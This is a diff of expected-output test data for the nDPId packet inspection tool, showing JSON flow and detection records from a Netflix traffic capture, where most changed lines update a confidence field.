00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1484319117511,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319117511,"pkt":"gCqoTGHM5JjWH70UCABFAABT2RsAAP8RXyXAqAEHwKgBAct\/ADUAP5\/hcXUBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} 
-00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1484319117538,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319117538,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UxAAEAR1XTAqAEBwKgBBwA1y38Av8eGcXWBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAACsABDQpHgXADAABAAEAAAArAAQ0KVZPwAwAAQABAAAAKwAENCnkd8AMAAEAAQAAACsABDQpn7bADAABAAEAAAArAAQ0J+8jwAwAAQABAAAAKwAENCc7i8AMAAEAAQAAACsABDQo+f3ADAABAAEAAAArAAQ0KRH0"} -00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} 
+00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":200000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} 
00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} 00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","server_names":"api-latam.netflix.com,htmltvui.netflix.com,api-eu.netflix.com,uiboot.netflix.com,api-global.netflix.com,api-user.netflix.com,api-us.netflix.com,api.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=California, L=los gatos, O=Netflix, Inc., OU=Ops, CN=api.netflix.com","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1","fingerprint":"FC:5B:F6:86:AE:E5:22:0D:60:0C:C3:DF:8F:02:80:3F:A3:60:0E:3C"}} -01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6789,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117651,"flow_last_seen":1484319117770,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117770,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} 
-01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6790,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117651,"flow_last_seen":1484319117771,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319117771,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying 
HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +01398{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6777,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319117605,"flow_last_seen":1484319117738,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3413,"flow_avg_l4_payload_len":487,"midstream":0,"thread_ts_msec":1484319117738,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
